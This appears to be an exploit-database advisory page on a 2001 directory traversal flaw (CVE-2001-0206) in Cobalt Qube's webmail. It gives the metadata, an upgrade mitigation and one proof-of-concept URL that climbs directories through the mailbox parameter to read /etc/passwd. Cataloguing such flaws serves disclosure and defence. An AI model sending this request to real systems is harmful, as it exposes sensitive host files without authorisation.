header-logo
Suggest Exploit
vendor:
Qube
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Qube
Affected Version From: Cobalt Qube
Affected Version To: Cobalt Qube
Patch Exists: YES
Related CWE: CVE-2001-0206
CPE: o:cobalt:qube
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2001

Cobalt Qube Directory Traversal Vulnerability

A vulnerability in Cobalt Qube's webmail implementation allows remote attackers to traverse directories. Malformed HTTP requests can be crafted to display sensitive information about the host.

Mitigation:

Upgrade to the latest version of Cobalt Qube
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2987/info

Cobalt Qube is an fully-featured network "server appliance".
It includes pre-installed tools and applications and can be put online with very little configuration.

A vulnerability in Cobalt Qube's webmail implementation allows remote attackers to traverse directories. Malformed HTTP requests can be crafted to display sensitive information about the host. 

http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1

Navigation

Suggest Exploit

Services By CQR